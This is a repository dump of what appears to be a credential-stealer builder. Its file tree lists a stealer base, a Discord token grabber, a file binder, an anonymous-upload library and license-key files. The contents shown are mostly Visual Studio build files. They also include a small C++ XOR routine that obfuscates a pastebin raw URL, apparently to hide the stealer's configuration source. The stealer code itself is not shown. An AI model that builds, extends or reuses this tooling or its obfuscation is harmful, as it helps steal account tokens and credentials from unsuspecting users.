├── .gitattributes ├── .gitignore ├── DLLs ├── AnonFileAPI.dll ├── MetroFramework.Design.dll ├── MetroFramework.Fonts.dll └── MetroFramework.dll ├── EncryptDecrypt ├── EncryptDecrypt.sln └── EncryptDecrypt │ ├── EncryptDecrypt.cpp │ ├── EncryptDecrypt.vcxproj │ ├── EncryptDecrypt.vcxproj.filters │ └── EncryptDecrypt.vcxproj.user ├── GenerateReg ├── GenerateReg.sln └── GenerateReg │ ├── App.config │ ├── GenerateReg.csproj │ ├── Program.cs │ └── Properties │ └── AssemblyInfo.cs ├── LICENSE ├── MainStealerBaseCPP ├── MainStealerBaseCPP.sln └── MainStealerBaseCPP │ ├── FileWatcher.h │ ├── MainStealerBaseCPP.cpp │ ├── MainStealerBaseCPP.vcxproj │ ├── MainStealerBaseCPP.vcxproj.filters │ ├── MainStealerBaseCPP.vcxproj.user │ └── XorString.h ├── README.md ├── Sources-PasteBin-Examples ├── BinderSrc.txt ├── FullLicenseKeys.txt └── LicenseKeysForCPP.txt ├── Z-Builder ├── .editorconfig ├── Z-Builder.sln ├── Z-Builder │ ├── App.config │ ├── Class1.cs │ ├── Form1.Designer.cs │ ├── Form1.cs │ ├── Form1.resx │ ├── Form2.Designer.cs │ ├── Form2.cs │ ├── Form2.resx │ ├── Program.cs │ ├── Properties │ │ ├── AssemblyInfo.cs │ │ ├── Resources.Designer.cs │ │ ├── Resources.resx │ │ ├── Settings.Designer.cs │ │ └── Settings.settings │ ├── Resources │ │ ├── AntiDelete.exe │ │ └── Z-Icon.ico │ ├── Z-Builder.csproj │ ├── app.manifest │ ├── bin │ │ ├── Debug │ │ │ ├── AnonFileAPI.dll │ │ │ ├── MetroFramework.Design.dll │ │ │ ├── MetroFramework.Fonts.dll │ │ │ ├── MetroFramework.dll │ │ │ ├── Microsoft.Xaml.Behaviors.dll │ │ │ ├── System.Configuration.ConfigurationManager.dll │ │ │ ├── System.Configuration.ConfigurationManager.xml │ │ │ ├── System.Security.AccessControl.dll │ │ │ ├── System.Security.AccessControl.xml │ │ │ ├── System.Security.Permissions.dll │ │ │ ├── System.Security.Permissions.xml │ │ │ ├── System.Security.Principal.Windows.dll │ │ │ ├── System.Security.Principal.Windows.xml │ │ │ ├── Z-Builder.exe │ │ │ ├── Z-Builder.exe.Config │ │ │ └── Z-Builder.pdb │ │ └── Release │ │ │ ├── AnonFileAPI.dll │ │ │ ├── MetroFramework.Design.dll │ │ │ ├── MetroFramework.Fonts.dll │ │ │ ├── MetroFramework.dll │ │ │ ├── System.Configuration.ConfigurationManager.dll │ │ │ ├── System.Configuration.ConfigurationManager.xml │ │ │ ├── System.Security.AccessControl.dll │ │ │ ├── System.Security.AccessControl.xml │ │ │ ├── System.Security.Permissions.dll │ │ │ ├── System.Security.Permissions.xml │ │ │ ├── System.Security.Principal.Windows.dll │ │ │ ├── System.Security.Principal.Windows.xml │ │ │ ├── Z-Builder.exe │ │ │ ├── Z-Builder.exe.Config │ │ │ └── Z-Builder.pdb │ ├── obj │ │ ├── Debug │ │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── TempPE │ │ │ │ ├── Code.Designer.cs.dll │ │ │ │ └── Properties.Resources.Designer.cs.dll │ │ │ ├── Z-Builder.csproj.CopyComplete │ │ │ ├── Z-Builder.csproj.CoreCompileInputs.cache │ │ │ ├── Z-Builder.csproj.FileListAbsolute.txt │ │ │ ├── Z-Builder.csproj.GenerateResource.cache │ │ │ ├── Z-Builder.csproj.ResolveComReference.cache │ │ │ ├── Z-Builder.csprojAssemblyReference.cache │ │ │ ├── Z-Builder.exe │ │ │ ├── Z-Builder.pdb │ │ │ ├── Z_Builder.Form1.resources │ │ │ ├── Z_Builder.Form2.resources │ │ │ └── Z_Builder.Properties.Resources.resources │ │ └── Release │ │ │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ │ │ ├── DesignTimeResolveAssemblyReferences.cache │ │ │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ │ │ ├── TempPE │ │ │ └── Properties.Resources.Designer.cs.dll │ │ │ ├── Z-Builder.csproj.CopyComplete │ │ │ ├── Z-Builder.csproj.CoreCompileInputs.cache │ │ │ ├── Z-Builder.csproj.FileListAbsolute.txt │ │ │ ├── Z-Builder.csproj.GenerateResource.cache │ │ │ ├── Z-Builder.csprojAssemblyReference.cache │ │ │ ├── Z-Builder.exe │ │ │ ├── Z-Builder.pdb │ │ │ ├── Z_Builder.Form1.resources │ │ │ ├── Z_Builder.Form2.resources │ │ │ └── Z_Builder.Properties.Resources.resources │ └── packages.config └── packages │ ├── MetroModernUI.1.4.0.0 │ ├── .signature.p7s │ ├── MetroModernUI.1.4.0.0.nupkg │ └── lib │ │ └── net │ │ ├── MetroFramework.Design.dll │ │ ├── MetroFramework.Fonts.dll │ │ └── MetroFramework.dll │ ├── System.Configuration.ConfigurationManager.4.7.0 │ ├── .signature.p7s │ ├── LICENSE.TXT │ ├── System.Configuration.ConfigurationManager.4.7.0.nupkg │ ├── THIRD-PARTY-NOTICES.TXT │ ├── lib │ │ ├── net461 │ │ │ ├── System.Configuration.ConfigurationManager.dll │ │ │ └── System.Configuration.ConfigurationManager.xml │ │ └── netstandard2.0 │ │ │ ├── System.Configuration.ConfigurationManager.dll │ │ │ └── System.Configuration.ConfigurationManager.xml │ ├── ref │ │ ├── net461 │ │ │ ├── System.Configuration.ConfigurationManager.dll │ │ │ └── System.Configuration.ConfigurationManager.xml │ │ └── netstandard2.0 │ │ │ ├── System.Configuration.ConfigurationManager.dll │ │ │ └── System.Configuration.ConfigurationManager.xml │ ├── useSharedDesignerContext.txt │ └── version.txt │ ├── System.Security.AccessControl.4.7.0 │ ├── .signature.p7s │ ├── LICENSE.TXT │ ├── System.Security.AccessControl.4.7.0.nupkg │ ├── THIRD-PARTY-NOTICES.TXT │ ├── lib │ │ ├── net46 │ │ │ └── System.Security.AccessControl.dll │ │ ├── net461 │ │ │ ├── System.Security.AccessControl.dll │ │ │ └── System.Security.AccessControl.xml │ │ ├── netstandard1.3 │ │ │ └── System.Security.AccessControl.dll │ │ ├── netstandard2.0 │ │ │ ├── System.Security.AccessControl.dll │ │ │ └── System.Security.AccessControl.xml │ │ └── uap10.0.16299 │ │ │ └── _._ │ ├── ref │ │ ├── net46 │ │ │ └── System.Security.AccessControl.dll │ │ ├── net461 │ │ │ ├── System.Security.AccessControl.dll │ │ │ └── System.Security.AccessControl.xml │ │ ├── netstandard1.3 │ │ │ ├── System.Security.AccessControl.dll │ │ │ ├── System.Security.AccessControl.xml │ │ │ ├── de │ │ │ │ └── System.Security.AccessControl.xml │ │ │ ├── es │ │ │ │ └── System.Security.AccessControl.xml │ │ │ ├── fr │ │ │ │ └── System.Security.AccessControl.xml │ │ │ ├── it │ │ │ │ └── System.Security.AccessControl.xml │ │ │ ├── ja │ │ │ │ └── System.Security.AccessControl.xml │ │ │ ├── ko │ │ │ │ └── System.Security.AccessControl.xml │ │ │ ├── ru │ │ │ │ └── System.Security.AccessControl.xml │ │ │ ├── zh-hans │ │ │ │ └── System.Security.AccessControl.xml │ │ │ └── zh-hant │ │ │ │ └── System.Security.AccessControl.xml │ │ ├── netstandard2.0 │ │ │ ├── System.Security.AccessControl.dll │ │ │ └── System.Security.AccessControl.xml │ │ └── uap10.0.16299 │ │ │ └── _._ │ ├── runtimes │ │ └── win │ │ │ └── lib │ │ │ ├── net46 │ │ │ └── System.Security.AccessControl.dll │ │ │ ├── net461 │ │ │ ├── System.Security.AccessControl.dll │ │ │ └── System.Security.AccessControl.xml │ │ │ ├── netcoreapp2.0 │ │ │ ├── System.Security.AccessControl.dll │ │ │ └── System.Security.AccessControl.xml │ │ │ ├── netstandard1.3 │ │ │ └── System.Security.AccessControl.dll │ │ │ └── uap10.0.16299 │ │ │ └── _._ │ ├── useSharedDesignerContext.txt │ └── version.txt │ ├── System.Security.Permissions.4.7.0 │ ├── .signature.p7s │ ├── LICENSE.TXT │ ├── System.Security.Permissions.4.7.0.nupkg │ ├── THIRD-PARTY-NOTICES.TXT │ ├── lib │ │ ├── net461 │ │ │ ├── System.Security.Permissions.dll │ │ │ └── System.Security.Permissions.xml │ │ ├── netcoreapp3.0 │ │ │ ├── System.Security.Permissions.dll │ │ │ └── System.Security.Permissions.xml │ │ └── netstandard2.0 │ │ │ ├── System.Security.Permissions.dll │ │ │ └── System.Security.Permissions.xml │ ├── ref │ │ ├── net461 │ │ │ ├── System.Security.Permissions.dll │ │ │ └── System.Security.Permissions.xml │ │ ├── netcoreapp3.0 │ │ │ ├── System.Security.Permissions.dll │ │ │ └── System.Security.Permissions.xml │ │ └── netstandard2.0 │ │ │ ├── System.Security.Permissions.dll │ │ │ └── System.Security.Permissions.xml │ ├── useSharedDesignerContext.txt │ └── version.txt │ └── System.Security.Principal.Windows.4.7.0 │ ├── .signature.p7s │ ├── LICENSE.TXT │ ├── System.Security.Principal.Windows.4.7.0.nupkg │ ├── THIRD-PARTY-NOTICES.TXT │ ├── lib │ ├── net46 │ │ └── System.Security.Principal.Windows.dll │ ├── net461 │ │ ├── System.Security.Principal.Windows.dll │ │ └── System.Security.Principal.Windows.xml │ ├── netstandard1.3 │ │ └── System.Security.Principal.Windows.dll │ ├── netstandard2.0 │ │ ├── System.Security.Principal.Windows.dll │ │ └── System.Security.Principal.Windows.xml │ └── uap10.0.16299 │ │ └── _._ │ ├── ref │ ├── net46 │ │ └── System.Security.Principal.Windows.dll │ ├── net461 │ │ ├── System.Security.Principal.Windows.dll │ │ └── System.Security.Principal.Windows.xml │ ├── netcoreapp3.0 │ │ ├── System.Security.Principal.Windows.dll │ │ └── System.Security.Principal.Windows.xml │ ├── netstandard1.3 │ │ ├── System.Security.Principal.Windows.dll │ │ ├── System.Security.Principal.Windows.xml │ │ ├── de │ │ │ └── System.Security.Principal.Windows.xml │ │ ├── es │ │ │ └── System.Security.Principal.Windows.xml │ │ ├── fr │ │ │ └── System.Security.Principal.Windows.xml │ │ ├── it │ │ │ └── System.Security.Principal.Windows.xml │ │ ├── ja │ │ │ └── System.Security.Principal.Windows.xml │ │ ├── ko │ │ │ └── System.Security.Principal.Windows.xml │ │ ├── ru │ │ │ └── System.Security.Principal.Windows.xml │ │ ├── zh-hans │ │ │ └── System.Security.Principal.Windows.xml │ │ └── zh-hant │ │ │ └── System.Security.Principal.Windows.xml │ ├── netstandard2.0 │ │ ├── System.Security.Principal.Windows.dll │ │ └── System.Security.Principal.Windows.xml │ └── uap10.0.16299 │ │ └── _._ │ ├── runtimes │ ├── unix │ │ └── lib │ │ │ ├── netcoreapp2.0 │ │ │ ├── System.Security.Principal.Windows.dll │ │ │ └── System.Security.Principal.Windows.xml │ │ │ └── netcoreapp2.1 │ │ │ ├── System.Security.Principal.Windows.dll │ │ │ └── System.Security.Principal.Windows.xml │ └── win │ │ └── lib │ │ ├── net46 │ │ └── System.Security.Principal.Windows.dll │ │ ├── net461 │ │ ├── System.Security.Principal.Windows.dll │ │ └── System.Security.Principal.Windows.xml │ │ ├── netcoreapp2.0 │ │ ├── System.Security.Principal.Windows.dll │ │ └── System.Security.Principal.Windows.xml │ │ ├── netcoreapp2.1 │ │ ├── System.Security.Principal.Windows.dll │ │ └── System.Security.Principal.Windows.xml │ │ ├── netstandard1.3 │ │ └── System.Security.Principal.Windows.dll │ │ └── uap10.0.16299 │ │ └── _._ │ ├── useSharedDesignerContext.txt │ └── version.txt ├── Z-BuilderCL ├── Debug │ ├── Z-BuilderCL.exe │ ├── Z-BuilderCL.ilk │ └── Z-BuilderCL.pdb ├── Z-BuilderCL.sln └── Z-BuilderCL │ ├── Debug │ ├── Z-BuilderCL.Build.CppClean.log │ ├── Z-BuilderCL.exe.recipe │ ├── Z-BuilderCL.log │ ├── Z-BuilderCL.obj │ ├── Z-BuilderCL.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── Z-BuilderCL.lastbuildstate │ │ ├── Z-BuilderCL.write.1u.tlog │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ └── link.write.1.tlog │ ├── Z-BuilderCL.vcxproj.FileListAbsolute.txt │ ├── vc142.idb │ ├── vc142.pdb │ └── vcpkg.applocal.log │ ├── Release │ ├── Z-BuilderCL.Build.CppClean.log │ ├── Z-BuilderCL.exe.recipe │ ├── Z-BuilderCL.log │ ├── Z-BuilderCL.obj │ ├── Z-BuilderCL.tlog │ │ ├── CL.command.1.tlog │ │ ├── CL.read.1.tlog │ │ ├── CL.write.1.tlog │ │ ├── Z-BuilderCL.lastbuildstate │ │ ├── Z-BuilderCL.write.1u.tlog │ │ ├── link.command.1.tlog │ │ ├── link.read.1.tlog │ │ └── link.write.1.tlog │ ├── Z-BuilderCL.vcxproj.FileListAbsolute.txt │ ├── vc142.pdb │ └── vcpkg.applocal.log │ ├── XorString.h │ ├── Z-BuilderCL.cpp │ ├── Z-BuilderCL.vcxproj │ ├── Z-BuilderCL.vcxproj.filters │ ├── Z-BuilderCL.vcxproj.user │ └── registry.h ├── ZBDiscordTokenGrabber ├── ZBDiscordTokenGrabber.sln └── ZBDiscordTokenGrabber │ ├── App.config │ ├── Program.cs │ ├── Properties │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ ├── Resources.resx │ ├── Settings.Designer.cs │ └── Settings.settings │ ├── ZBDiscordTokenGrabber.csproj │ ├── bin │ ├── Debug │ │ ├── ZBDiscordTokenGrabber.exe │ │ ├── ZBDiscordTokenGrabber.exe.config │ │ └── ZBDiscordTokenGrabber.pdb │ └── Release │ │ ├── ZBDiscordTokenGrabber.exe │ │ ├── ZBDiscordTokenGrabber.exe.config │ │ └── ZBDiscordTokenGrabber.pdb │ └── obj │ ├── Debug │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ ├── DesignTimeResolveAssemblyReferences.cache │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── ZBDiscordTokenGrabber.Properties.Resources.resources │ ├── ZBDiscordTokenGrabber.csproj.CoreCompileInputs.cache │ ├── ZBDiscordTokenGrabber.csproj.FileListAbsolute.txt │ ├── ZBDiscordTokenGrabber.csproj.GenerateResource.cache │ ├── ZBDiscordTokenGrabber.csprojAssemblyReference.cache │ ├── ZBDiscordTokenGrabber.exe │ └── ZBDiscordTokenGrabber.pdb │ └── Release │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── ZBDiscordTokenGrabber.Properties.Resources.resources │ ├── ZBDiscordTokenGrabber.csproj.CoreCompileInputs.cache │ ├── ZBDiscordTokenGrabber.csproj.FileListAbsolute.txt │ ├── ZBDiscordTokenGrabber.csproj.GenerateResource.cache │ ├── ZBDiscordTokenGrabber.csprojAssemblyReference.cache │ ├── ZBDiscordTokenGrabber.exe │ └── ZBDiscordTokenGrabber.pdb └── savedecrypter-master ├── .gitattributes ├── .gitignore ├── LICENSE ├── README.md ├── savedecrypter.sln └── savedecrypter ├── ClanLib-2.0 └── Sources │ ├── API │ └── Core │ │ ├── IOData │ │ ├── access_control_list.h │ │ ├── cl_endian.h │ │ ├── datatypes.h │ │ ├── directory.h │ │ ├── directory_scanner.h │ │ ├── file.h │ │ ├── file_help.h │ │ ├── iodevice.h │ │ ├── iodevice_memory.h │ │ ├── iodevice_provider.h │ │ ├── path_help.h │ │ ├── pipe_connection.h │ │ ├── pipe_listen.h │ │ ├── security_descriptor.h │ │ ├── security_identifier.h │ │ ├── virtual_directory.h │ │ ├── virtual_directory_listing.h │ │ ├── virtual_directory_listing_entry.h │ │ ├── virtual_file_source.h │ │ └── virtual_file_system.h │ │ ├── Math │ │ ├── angle.h │ │ ├── base64_decoder.h │ │ ├── base64_encoder.h │ │ ├── bezier_curve.h │ │ ├── circle.h │ │ ├── cl_math.h │ │ ├── delauney_triangulator.h │ │ ├── ear_clip_result.h │ │ ├── ear_clip_triangulator.h │ │ ├── hash_functions.h │ │ ├── line.h │ │ ├── line_math.h │ │ ├── line_ray.h │ │ ├── line_segment.h │ │ ├── mat2.h │ │ ├── mat3.h │ │ ├── mat4.h │ │ ├── math.h │ │ ├── origin.h │ │ ├── outline_triangulator.h │ │ ├── point.h │ │ ├── pointset_math.h │ │ ├── quad.h │ │ ├── quaternion.h │ │ ├── rect.h │ │ ├── rect_packer.h │ │ ├── sha1.h │ │ ├── size.h │ │ ├── triangle_math.h │ │ ├── vec1.h │ │ ├── vec2.h │ │ ├── vec3.h │ │ └── vec4.h │ │ ├── System │ │ ├── autoptr.h │ │ ├── block_allocator.h │ │ ├── command_line.h │ │ ├── comptr.h │ │ ├── console_window.h │ │ ├── databuffer.h │ │ ├── datetime.h │ │ ├── disposable_object.h │ │ ├── event.h │ │ ├── event_provider.h │ │ ├── exception.h │ │ ├── fixed_memory_pool.h │ │ ├── interlocked_variable.h │ │ ├── keep_alive.h │ │ ├── memory_pool.h │ │ ├── mutex.h │ │ ├── registry_key.h │ │ ├── runnable.h │ │ ├── service.h │ │ ├── setup_core.h │ │ ├── sharedptr.h │ │ ├── static_memory_pool.h │ │ ├── system.h │ │ ├── thread.h │ │ ├── thread_local_storage.h │ │ ├── timer.h │ │ └── weakptr.h │ │ ├── Text │ │ ├── console.h │ │ ├── console_logger.h │ │ ├── file_logger.h │ │ ├── logger.h │ │ ├── string16.h │ │ ├── string8.h │ │ ├── string_allocator.h │ │ ├── string_container.h │ │ ├── string_data.h │ │ ├── string_data16.h │ │ ├── string_data8.h │ │ ├── string_format.h │ │ ├── string_help.h │ │ ├── string_ref16.h │ │ ├── string_ref8.h │ │ ├── string_reference.h │ │ ├── string_types.h │ │ ├── temp_string_container.h │ │ └── utf8_reader.h │ │ ├── api_core.h │ │ └── core.h │ └── Core │ ├── IOData │ ├── Unix │ │ ├── directory_scanner_unix.cpp │ │ └── directory_scanner_unix.h │ ├── Win32 │ │ ├── directory_scanner_win32.cpp │ │ └── directory_scanner_win32.h │ ├── access_control_list.cpp │ ├── access_control_list.h │ ├── cl_endian.h │ ├── datatypes.h │ ├── directory.cpp │ ├── directory.h │ ├── directory_scanner.cpp │ ├── directory_scanner.h │ ├── directory_scanner_impl.h │ ├── endianess.cpp │ ├── file.cpp │ ├── file.h │ ├── file_help.cpp │ ├── file_help.h │ ├── iodevice.cpp │ ├── iodevice.h │ ├── iodevice_impl.h │ ├── iodevice_memory.cpp │ ├── iodevice_memory.h │ ├── iodevice_provider.h │ ├── iodevice_provider_file.cpp │ ├── iodevice_provider_file.h │ ├── iodevice_provider_memory.cpp │ ├── iodevice_provider_memory.h │ ├── iodevice_provider_pipe_connection.cpp │ ├── iodevice_provider_pipe_connection.h │ ├── path_help.cpp │ ├── path_help.h │ ├── pipe_connection.cpp │ ├── pipe_connection.h │ ├── pipe_listen.cpp │ ├── pipe_listen.h │ ├── pipe_listen_impl.cpp │ ├── pipe_listen_impl.h │ ├── security_descriptor.cpp │ ├── security_descriptor.h │ ├── security_identifier.cpp │ ├── security_identifier.h │ ├── virtual_directory.cpp │ ├── virtual_directory.h │ ├── virtual_directory_listing.cpp │ ├── virtual_directory_listing.h │ ├── virtual_directory_listing_entry.cpp │ ├── virtual_directory_listing_entry.h │ ├── virtual_file_source.h │ ├── virtual_file_source_file.cpp │ ├── virtual_file_source_file.h │ ├── virtual_file_source_zip.cpp │ ├── virtual_file_source_zip.h │ ├── virtual_file_system.cpp │ └── virtual_file_system.h │ ├── Math │ ├── angle.cpp │ ├── base64_decoder.cpp │ ├── base64_encoder.cpp │ ├── bezier_curve.cpp │ ├── bezier_curve_impl.cpp │ ├── bezier_curve_impl.h │ ├── delauney_triangulator.cpp │ ├── delauney_triangulator_generic.cpp │ ├── delauney_triangulator_generic.h │ ├── ear_clip_result.cpp │ ├── ear_clip_triangulator.cpp │ ├── ear_clip_triangulator_impl.cpp │ ├── ear_clip_triangulator_impl.h │ ├── hash_functions.cpp │ ├── line.cpp │ ├── line_math.cpp │ ├── line_ray.cpp │ ├── line_segment.cpp │ ├── mat2.cpp │ ├── mat3.cpp │ ├── mat4.cpp │ ├── origin.cpp │ ├── outline_triangulator.cpp │ ├── outline_triangulator_generic.cpp │ ├── outline_triangulator_generic.h │ ├── pointset_math.cpp │ ├── quad.cpp │ ├── quaternion.cpp │ ├── rect.cpp │ ├── rect_packer.cpp │ ├── rect_packer_impl.cpp │ ├── rect_packer_impl.h │ ├── sha1.cpp │ ├── sha1_impl.cpp │ ├── sha1_impl.h │ ├── triangle_math.cpp │ ├── vec1.cpp │ ├── vec2.cpp │ ├── vec3.cpp │ └── vec4.cpp │ ├── System │ ├── Unix │ │ ├── event_provider_socketpair.cpp │ │ ├── event_provider_socketpair.h │ │ ├── init_linux.cpp │ │ ├── init_linux.h │ │ ├── service_unix.cpp │ │ ├── service_unix.h │ │ ├── thread_unix.cpp │ │ └── thread_unix.h │ ├── Win32 │ │ ├── event_provider_win32.cpp │ │ ├── event_provider_win32.h │ │ ├── init_win32.cpp │ │ ├── init_win32.h │ │ ├── service_win32.cpp │ │ ├── service_win32.h │ │ ├── thread_win32.cpp │ │ └── thread_win32.h │ ├── block_allocator.cpp │ ├── command_line.cpp │ ├── command_line_generic.cpp │ ├── command_line_generic.h │ ├── console_window.cpp │ ├── console_window_generic.cpp │ ├── console_window_generic.h │ ├── databuffer.cpp │ ├── datetime.cpp │ ├── detect_3dnow.cpp │ ├── detect_cpu_ext.cpp │ ├── detect_mmx.cpp │ ├── disposable_object.cpp │ ├── event.cpp │ ├── event_impl.cpp │ ├── event_impl.h │ ├── exception.cpp │ ├── keep_alive.cpp │ ├── mutex.cpp │ ├── registry_key.cpp │ ├── runnable.cpp │ ├── service.cpp │ ├── service_impl.cpp │ ├── service_impl.h │ ├── setup_core.cpp │ ├── static_memory_pool.cpp │ ├── system.cpp │ ├── thread.cpp │ ├── thread_impl.h │ ├── thread_local_storage.cpp │ ├── thread_local_storage_impl.cpp │ ├── thread_local_storage_impl.h │ └── timer.cpp │ ├── Text │ ├── console.cpp │ ├── console_logger.cpp │ ├── file_logger.cpp │ ├── logger.cpp │ ├── string16.cpp │ ├── string8.cpp │ ├── string_allocator.cpp │ ├── string_container.cpp │ ├── string_data.cpp │ ├── string_data16.cpp │ ├── string_data8.cpp │ ├── string_format.cpp │ ├── string_help.cpp │ ├── string_ref16.cpp │ ├── string_ref8.cpp │ ├── string_reference.cpp │ ├── temp_string_container.cpp │ └── utf8_reader.cpp │ ├── core_global.cpp │ ├── core_global.h │ ├── core_iostream.cpp │ ├── precomp.cpp │ └── precomp.h ├── proton ├── Variant.cpp ├── Variant.hpp ├── plat.h ├── rtRect.h ├── vardb.cpp └── vardb.h ├── savedecrypter.cpp ├── savedecrypter.vcxproj └── savedecrypter.vcxproj.filters /.gitattributes: -------------------------------------------------------------------------------- 1 | *ipch filter=lfs diff=lfs merge=lfs -text 2 | *.ipch filter=lfs diff=lfs merge=lfs -text 3 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.ipch 2 | -------------------------------------------------------------------------------- /DLLs/AnonFileAPI.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/DLLs/AnonFileAPI.dll -------------------------------------------------------------------------------- /DLLs/MetroFramework.Design.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/DLLs/MetroFramework.Design.dll -------------------------------------------------------------------------------- /DLLs/MetroFramework.Fonts.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/DLLs/MetroFramework.Fonts.dll -------------------------------------------------------------------------------- /DLLs/MetroFramework.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ZeppyXD/Z-Builder-Source-CPP/f48e0f22b5d4d183b841abb8e61e1bdb5c25999d/DLLs/MetroFramework.dll -------------------------------------------------------------------------------- /EncryptDecrypt/EncryptDecrypt.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30413.136 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "EncryptDecrypt", "EncryptDecrypt\EncryptDecrypt.vcxproj", "{CED8A121-1DB9-4716-BA1C-EA0E6ED50EA2}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {CED8A121-1DB9-4716-BA1C-EA0E6ED50EA2}.Debug|x64.ActiveCfg = Debug|x64 17 | {CED8A121-1DB9-4716-BA1C-EA0E6ED50EA2}.Debug|x64.Build.0 = Debug|x64 18 | {CED8A121-1DB9-4716-BA1C-EA0E6ED50EA2}.Debug|x86.ActiveCfg = Debug|Win32 19 | {CED8A121-1DB9-4716-BA1C-EA0E6ED50EA2}.Debug|x86.Build.0 = Debug|Win32 20 | {CED8A121-1DB9-4716-BA1C-EA0E6ED50EA2}.Release|x64.ActiveCfg = Release|x64 21 | {CED8A121-1DB9-4716-BA1C-EA0E6ED50EA2}.Release|x64.Build.0 = Release|x64 22 | {CED8A121-1DB9-4716-BA1C-EA0E6ED50EA2}.Release|x86.ActiveCfg = Release|Win32 23 | {CED8A121-1DB9-4716-BA1C-EA0E6ED50EA2}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {8BF87255-CF14-4E36-B41D-D96CC23B17B6} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /EncryptDecrypt/EncryptDecrypt/EncryptDecrypt.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | using namespace std; 4 | 5 | string encryptDecrypt(string toEncrypt) { 6 | char key[8] = { 'Z', 'E', 'P', 'H', 'Y', 'R' }; //Any chars will work 7 | string output = toEncrypt; 8 | 9 | for (int i = 0; i < toEncrypt.size(); i++) 10 | output[i] = toEncrypt[i] ^ key[i % (sizeof(key) / sizeof(char))]; 11 | 12 | return output; 13 | } 14 | 15 | int main(int argc, const char* argv[]) 16 | { 17 | string encrypted = encryptDecrypt("https://pastebin.com/raw/c51sk9Qh"); 18 | ofstream MyFile("C:\\Users\\zephy\\Downloads\\Test.txt"); 19 | MyFile << encrypted; 20 | cout << "Encrypted: " << encrypted << "| Length:" << encrypted.size() << "\n"; 21 | 22 | string decrypted = encryptDecrypt(encrypted); 23 | cout << "Decrypted: " << decrypted << "| Length:" << decrypted.size() << "\n"; 24 | 25 | return 0; 26 | } -------------------------------------------------------------------------------- /EncryptDecrypt/EncryptDecrypt/EncryptDecrypt.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /EncryptDecrypt/EncryptDecrypt/EncryptDecrypt.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /GenerateReg/GenerateReg.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30523.141 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GenerateReg", "GenerateReg\GenerateReg.csproj", "{7D5D7E49-6243-44D3-8B71-FD57D0456057}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {7D5D7E49-6243-44D3-8B71-FD57D0456057}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {7D5D7E49-6243-44D3-8B71-FD57D0456057}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {7D5D7E49-6243-44D3-8B71-FD57D0456057}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {7D5D7E49-6243-44D3-8B71-FD57D0456057}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {E29A50E1-A7FA-4905-9BC1-8998B358A28E} 24 | EndGlobalSection 25 